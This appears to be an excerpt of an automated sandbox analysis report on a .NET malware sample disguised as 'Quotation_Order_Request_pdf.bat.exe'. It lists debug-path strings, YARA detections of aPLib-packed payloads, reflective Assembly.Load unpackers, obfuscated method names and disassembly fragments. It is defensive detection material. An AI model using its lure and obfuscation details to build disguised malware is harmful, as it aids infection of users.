Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\HrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tc.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: HrOW.pdb source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr, WER9EB9.tmp.dmp.16.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2947233942.0000000000802000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\HrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.000000000680C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: HrOW.pdbSHA256q source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr, WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\bCirqu.PDB=J+T source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\HrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Dynamic.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb= source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\HrOW.pdbpdbrOW.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HrOW.pdb21-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32d source: bCirqu.exe, 00000009.00000002.2002963131.000000000680C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb< source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: HrOW.pdbs\HrOW.pdbpdbrOW.pdbrOW.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: bCirqu.exe, 00000009.00000002.2002963131.000000000680C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdbp$ source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbntfk source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.CSharp.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb0 source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: Osymbols\exe\HrOW.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2947233942.0000000000802000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: mscorlib.pdbup source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\HrOW.pdb1v source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: bCirqu.exe, 00000009.00000002.1994302880.0000000000702000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdbh source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: bCirqu.exe, 00000009.00000002.1994302880.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: bCirqu.exe, 00000009.00000002.2002963131.000000000682A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbH)T source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: m.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER9EB9.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb$ source: bCirqu.exe, 00000009.00000002.2002963131.000000000682A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9EB9.tmp.dmp.16.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, cDGYNOeND6fInr0xDe.cs	.Net Code: G7ClLhl19X System.Reflection.Assembly.Load(byte[])
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, cDGYNOeND6fInr0xDe.cs	.Net Code: G7ClLhl19X System.Reflection.Assembly.Load(byte[])
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.368f7f8.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.7c70000.5.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 9.2.bCirqu.exe.262f510.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bCirqu.exe PID: 7256, type: MEMORYSTR

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07B6BFA2 push esp; iretd	0_2_07B6BFA9
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07B6BFE8 pushfd ; iretd	0_2_07B6BFF1
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07B6BD9C push ss; iretd	0_2_07B6BDDB
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07B6BD6A push ss; iretd	0_2_07B6BD9B
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C92718 push edx; retf 0007h	0_2_07C9271A
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C92B78 pushad ; retf 0007h	0_2_07C92B7A
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C92991 push esp; retf 0007h	0_2_07C92992
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C92870 push ebx; retf 0007h	0_2_07C92872
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_082328B8 pushad ; retf	0_2_08232981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC0 push eax; ret	8_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC0 push eax; ret	8_2_00402AFC
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_05519E5B push FFFFFF8Bh; retf	9_2_05519E5D
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0679BFE8 pushfd ; iretd	9_2_0679BFF1
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0679BFA2 push esp; iretd	9_2_0679BFA9

Source: Quotation_Order_Request_pdf.bat.exe	Static PE information: section name: .text entropy: 7.724763104562377
Source: bCirqu.exe.0.dr	Static PE information: section name: .text entropy: 7.724763104562377

Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, BIR3230ayKmMh6O6pB.cs	High entropy of concatenated method names: 'Dispose', 'zaiYtbRCm9', 'bBoNgUBuhr', 'rvrctsiZPC', 'vT4YFaKafy', 'zv6YzAxrLE', 'ProcessDialogKey', 'GBdN1kxJhv', 'uB9NY7nX7b', 'zlpNNqvn3G'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, nsRGaqaEqP1HJJA2eb.cs	High entropy of concatenated method names: 'm8vUo3BI7u', 'Ak2U0M6WwW', 'av4Us2V4Vd', 'MBTU8al8s6', 'RDiUeadxlG', 'sn2sv5NJ0l', 'cnGsWqmmP1', 'RxAsfIRJuJ', 'xOYsOR26U1', 'URWstrafXJ'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, crI9DNB7Hslfh75oVV.cs	High entropy of concatenated method names: 'j7ZwH8ajjE', 'nlfwuEf5fA', 'ToString', 'rWGwRsuO4T', 'iT6w0KfRc3', 'fLOw2o6gyg', 'K5xwsNqa4V', 'rUlwUSpZmQ', 'nRIw8VP4os', 'FBmwe6H7Yg'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, mXllPvY1FXa9cyV9d7P.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5fiqjdnKP', 'QBdiGty7eN', 'lDQiDjmibj', 'zuMi7Qex2R', 'KVoiCo8b0p', 'aikiPPIf3r', 'V8fiBxDSpw'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, cC80KbYNfjqx6HYZgL9.cs	High entropy of concatenated method names: 'ToString', 'roZ9noD6N3', 'uEr9AvqVmH', 'u8x9po5rkd', 'ckL9aas3Ig', 'VUJ9gFL81g', 'TXe9XYOa8R', 'sHk9mScpSS', 'PCf4fye0EIFvoV5YwwI', 'D5oO16eCTOkRWalhJZi'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, a8b5tinAEfOTHiMjtw.cs	High entropy of concatenated method names: 'CRU07wfZ1J', 'hOQ0Co2CSw', 'Wx30Prvrah', 'TRI0BPB7Hi', 'MN30vgI6nc', 'wVZ0WICAFQ', 'XTe0fS4BLr', 'lIW0OR5WtU', 'AOU0t9lXCD', 'VFg0Fup2WJ'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, GbD1dpzotNKWaZCq2I.cs	High entropy of concatenated method names: 'trZir42LPq', 'dxYinljBcf', 'PnMiAflaqa', 'xl6iaJiAsw', 'DSUigltMx5', 'H4RimjLfxD', 'Wu0iQjHis3', 'esui5ZP8RN', 'HoIiZcxuMx', 'cPOiIoujZ9'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, DAQHIUYYNwjrLskrxai.cs	High entropy of concatenated method names: 'j2LiFocxfD', 'qMNiz1hCtS', 'F6l91huHKc', 'm8B9YGiN8m', 'Afq9NwcTuA', 'RAI9hmROCk', 'LCF9lv9gUh', 'jL89oNDOrq', 'lkP9R85mJ8', 'p2q90lgKVf'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, U070fOVG3wtovr9ScW.cs	High entropy of concatenated method names: 'ryX8ZEvCtm', 'UH98ICqt5e', 'U108L1MXUi', 'HdQ83YKd5J', 'XfB8K2tSs2', 'PFr8rQ1fPL', 'Rw98yqYlnv', 'BIC8ngdqxH', 'Lh38AfSUBd', 'XW48pmrrAJ'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, Be1PrN7Wg482Oa0ecY.cs	High entropy of concatenated method names: 'WYTTxnp8Ss', 'ITgTGqsheZ', 'YHbT70grRD', 't9QTCwDdu6', 'Ix1TgSItsd', 'lwqTXlvTHx', 'PYkTm8MtA2', 'hsYTQ4vCVx', 'bM3TcEWlFN', 'MBWTbPMgUI'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, Ovn3GXFepLcZXilaBp.cs	High entropy of concatenated method names: 'UfLi2t2LDl', 'X3KisqSdsy', 'cJriUqIx5w', 'G0Yi8SDOlp', 'bjeik7cIPe', 'pWEieMxdib', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, cDGYNOeND6fInr0xDe.cs	High entropy of concatenated method names: 'M4thoQek1A', 'qkThRt7NVa', 'R49h0ErYO6', 'QhPh2s10XL', 'KQPhsZHXUK', 'YHjhUW1peu', 'lqih8H19W0', 'aunheT5R9E', 'bEuhELLJ9o', 'WLThHtJ9EB'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, oNFvHslh7v3nmYfD6h.cs	High entropy of concatenated method names: 'QQ1Y88b5ti', 'EEfYeOTHiM', 'b3BYHYRefI', 'iq8Yuv71jo', 'KgZYT7ZusR', 'PaqYjEqP1H', 'iv0T66CDQr4l6b46uq', 'X4uuZjsrPSnxrJIJ0V', 'CF8YYPmnRS', 'YMNYh5TlfB'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, RojHOsDclSjdDDDwbH.cs	High entropy of concatenated method names: 'YGq6nFD1Te', 'Nn06AvhxB1', 'pIj6aqXpk2', 'g9C6g0LC8B', 'UPJ6mIcnDQ', 'po66QmhkgA', 'VoR6bQRe86', 'HG76dolDOI', 'pcF6xZXud3', 'tv16qJgHrk'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, iobciB26J8vXD1QMWq.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TKiNt7b9UU', 'B2INFUjklt', 'S88NzA3VeQ', 'yTuh1wmQO9', 'eIJhYO7YBN', 'p9MhN8fZT4', 'VXqhhrAu0P', 'qKobX4QQoIX8NWAHgGA'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, IUPWHBbMIqcQZCW5qQ.cs	High entropy of concatenated method names: 'BDi8R92phg', 'Urq82MMOcc', 'zYU8UHl8tq', 'pCVUFgYKEu', 'RWeUzn9bRD', 'u7u81PxZsL', 'pjf8YeagyB', 'F3B8NGCLk6', 'sxO8h7tUcX', 'bSp8lJ4O3C'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, xI6OMMNwUGlbJjOnr1.cs	High entropy of concatenated method names: 'soQLk40dg', 'iTx3ZQbWr', 'ps9rMcosu', 'k0ryJjF0n', 'R3eA7nQeZ', 'C0CpxcVH1', 'q4Z5kK3l7IYRqbx8VP', 'zT9d3DPO31adNflfro', 'MO94BQkFj', 'BSbiAXpyH'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, E3Qc7KPJ6qTqgAVlrU.cs	High entropy of concatenated method names: 'ToString', 'r7Jjq3FMyV', 'QkCjgRVF4q', 'gNAjX5PedP', 'srljmLee8Z', 'XAyjQtGUci', 'v3Jjc43tHF', 'FIxjbnImK8', 'LhDjd6udV8', 'fwJjVGI9Gy'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, aLPFyNA3BYRefIUq8v.cs	High entropy of concatenated method names: 'nrU23aUDOb', 'wuv2rwOXK3', 'Bhb2nYhnbY', 'E3E2AvrPYs', 'nwN2TAS7sj', 'AvL2j0FuwW', 'WHp2wXPj45', 'V5g24G0rGq', 'iIP2k9rPqm', 'krP2iotBIl'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, MogLiYYlvKuERfONGA0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NHZSkhXWN8', 'A4hSiBfURY', 'urKS9GwPqG', 'XkRSSKPb2S', 'P6wSJeYxRX', 'wFPSMkIOlp', 'TCyS5Vbid6'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, eE0OeLfchLaibRCm9J.cs	High entropy of concatenated method names: 'jVkkTJ0LKf', 'qsckwE9iLG', 'sX5kkVCx2Q', 'dbok9arVrO', 'EeEkJsy5WG', 'AVCk5IFU6h', 'Dispose', 'IrV4Rce8Kh', 'hpA40klOQw', 'RVL42KAPYB'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, q46R8vWWMsPtLpNDMd.cs	High entropy of concatenated method names: 'nqxwO8E4eu', 'iC8wFq1mWf', 'mDX41XALgH', 'frB4YRlfat', 'jfowqEA8JU', 'p4fwGE2sEW', 'P7AwDOUJRK', 'nWYw78vXTj', 'dFuwCPst5h', 'KkrwPVxN7a'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, LkxJhvtSB97nX7bLlp.cs	High entropy of concatenated method names: 'aLKkaFLGxs', 'LWHkgWQdlA', 'xMXkXwX8eY', 'PpEkmHuBlV', 'zSekQX6tha', 'UnOkc7itXj', 'LeBkbiY7Ff', 'iL1kd4hE9n', 'E6WkVIc7HP', 'I3WkxWujC3'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, BIR3230ayKmMh6O6pB.cs	High entropy of concatenated method names: 'Dispose', 'zaiYtbRCm9', 'bBoNgUBuhr', 'rvrctsiZPC', 'vT4YFaKafy', 'zv6YzAxrLE', 'ProcessDialogKey', 'GBdN1kxJhv', 'uB9NY7nX7b', 'zlpNNqvn3G'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, nsRGaqaEqP1HJJA2eb.cs	High entropy of concatenated method names: 'm8vUo3BI7u', 'Ak2U0M6WwW', 'av4Us2V4Vd', 'MBTU8al8s6', 'RDiUeadxlG', 'sn2sv5NJ0l', 'cnGsWqmmP1', 'RxAsfIRJuJ', 'xOYsOR26U1', 'URWstrafXJ'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, crI9DNB7Hslfh75oVV.cs	High entropy of concatenated method names: 'j7ZwH8ajjE', 'nlfwuEf5fA', 'ToString', 'rWGwRsuO4T', 'iT6w0KfRc3', 'fLOw2o6gyg', 'K5xwsNqa4V', 'rUlwUSpZmQ', 'nRIw8VP4os', 'FBmwe6H7Yg'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, mXllPvY1FXa9cyV9d7P.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5fiqjdnKP', 'QBdiGty7eN', 'lDQiDjmibj', 'zuMi7Qex2R', 'KVoiCo8b0p', 'aikiPPIf3r', 'V8fiBxDSpw'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, cC80KbYNfjqx6HYZgL9.cs	High entropy of concatenated method names: 'ToString', 'roZ9noD6N3', 'uEr9AvqVmH', 'u8x9po5rkd', 'ckL9aas3Ig', 'VUJ9gFL81g', 'TXe9XYOa8R', 'sHk9mScpSS', 'PCf4fye0EIFvoV5YwwI', 'D5oO16eCTOkRWalhJZi'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, a8b5tinAEfOTHiMjtw.cs	High entropy of concatenated method names: 'CRU07wfZ1J', 'hOQ0Co2CSw', 'Wx30Prvrah', 'TRI0BPB7Hi', 'MN30vgI6nc', 'wVZ0WICAFQ', 'XTe0fS4BLr', 'lIW0OR5WtU', 'AOU0t9lXCD', 'VFg0Fup2WJ'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, GbD1dpzotNKWaZCq2I.cs	High entropy of concatenated method names: 'trZir42LPq', 'dxYinljBcf', 'PnMiAflaqa', 'xl6iaJiAsw', 'DSUigltMx5', 'H4RimjLfxD', 'Wu0iQjHis3', 'esui5ZP8RN', 'HoIiZcxuMx', 'cPOiIoujZ9'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, DAQHIUYYNwjrLskrxai.cs	High entropy of concatenated method names: 'j2LiFocxfD', 'qMNiz1hCtS', 'F6l91huHKc', 'm8B9YGiN8m', 'Afq9NwcTuA', 'RAI9hmROCk', 'LCF9lv9gUh', 'jL89oNDOrq', 'lkP9R85mJ8', 'p2q90lgKVf'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, U070fOVG3wtovr9ScW.cs	High entropy of concatenated method names: 'ryX8ZEvCtm', 'UH98ICqt5e', 'U108L1MXUi', 'HdQ83YKd5J', 'XfB8K2tSs2', 'PFr8rQ1fPL', 'Rw98yqYlnv', 'BIC8ngdqxH', 'Lh38AfSUBd', 'XW48pmrrAJ'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, Be1PrN7Wg482Oa0ecY.cs	High entropy of concatenated method names: 'WYTTxnp8Ss', 'ITgTGqsheZ', 'YHbT70grRD', 't9QTCwDdu6', 'Ix1TgSItsd', 'lwqTXlvTHx', 'PYkTm8MtA2', 'hsYTQ4vCVx', 'bM3TcEWlFN', 'MBWTbPMgUI'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, Ovn3GXFepLcZXilaBp.cs	High entropy of concatenated method names: 'UfLi2t2LDl', 'X3KisqSdsy', 'cJriUqIx5w', 'G0Yi8SDOlp', 'bjeik7cIPe', 'pWEieMxdib', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, cDGYNOeND6fInr0xDe.cs	High entropy of concatenated method names: 'M4thoQek1A', 'qkThRt7NVa', 'R49h0ErYO6', 'QhPh2s10XL', 'KQPhsZHXUK', 'YHjhUW1peu', 'lqih8H19W0', 'aunheT5R9E', 'bEuhELLJ9o', 'WLThHtJ9EB'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, oNFvHslh7v3nmYfD6h.cs	High entropy of concatenated method names: 'QQ1Y88b5ti', 'EEfYeOTHiM', 'b3BYHYRefI', 'iq8Yuv71jo', 'KgZYT7ZusR', 'PaqYjEqP1H', 'iv0T66CDQr4l6b46uq', 'X4uuZjsrPSnxrJIJ0V', 'CF8YYPmnRS', 'YMNYh5TlfB'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, RojHOsDclSjdDDDwbH.cs	High entropy of concatenated method names: 'YGq6nFD1Te', 'Nn06AvhxB1', 'pIj6aqXpk2', 'g9C6g0LC8B', 'UPJ6mIcnDQ', 'po66QmhkgA', 'VoR6bQRe86', 'HG76dolDOI', 'pcF6xZXud3', 'tv16qJgHrk'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, iobciB26J8vXD1QMWq.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TKiNt7b9UU', 'B2INFUjklt', 'S88NzA3VeQ', 'yTuh1wmQO9', 'eIJhYO7YBN', 'p9MhN8fZT4', 'VXqhhrAu0P', 'qKobX4QQoIX8NWAHgGA'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, IUPWHBbMIqcQZCW5qQ.cs	High entropy of concatenated method names: 'BDi8R92phg', 'Urq82MMOcc', 'zYU8UHl8tq', 'pCVUFgYKEu', 'RWeUzn9bRD', 'u7u81PxZsL', 'pjf8YeagyB', 'F3B8NGCLk6', 'sxO8h7tUcX', 'bSp8lJ4O3C'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, xI6OMMNwUGlbJjOnr1.cs	High entropy of concatenated method names: 'soQLk40dg', 'iTx3ZQbWr', 'ps9rMcosu', 'k0ryJjF0n', 'R3eA7nQeZ', 'C0CpxcVH1', 'q4Z5kK3l7IYRqbx8VP', 'zT9d3DPO31adNflfro', 'MO94BQkFj', 'BSbiAXpyH'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, E3Qc7KPJ6qTqgAVlrU.cs	High entropy of concatenated method names: 'ToString', 'r7Jjq3FMyV', 'QkCjgRVF4q', 'gNAjX5PedP', 'srljmLee8Z', 'XAyjQtGUci', 'v3Jjc43tHF', 'FIxjbnImK8', 'LhDjd6udV8', 'fwJjVGI9Gy'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, aLPFyNA3BYRefIUq8v.cs	High entropy of concatenated method names: 'nrU23aUDOb', 'wuv2rwOXK3', 'Bhb2nYhnbY', 'E3E2AvrPYs', 'nwN2TAS7sj', 'AvL2j0FuwW', 'WHp2wXPj45', 'V5g24G0rGq', 'iIP2k9rPqm', 'krP2iotBIl'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, MogLiYYlvKuERfONGA0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NHZSkhXWN8', 'A4hSiBfURY', 'urKS9GwPqG', 'XkRSSKPb2S', 'P6wSJeYxRX', 'wFPSMkIOlp', 'TCyS5Vbid6'
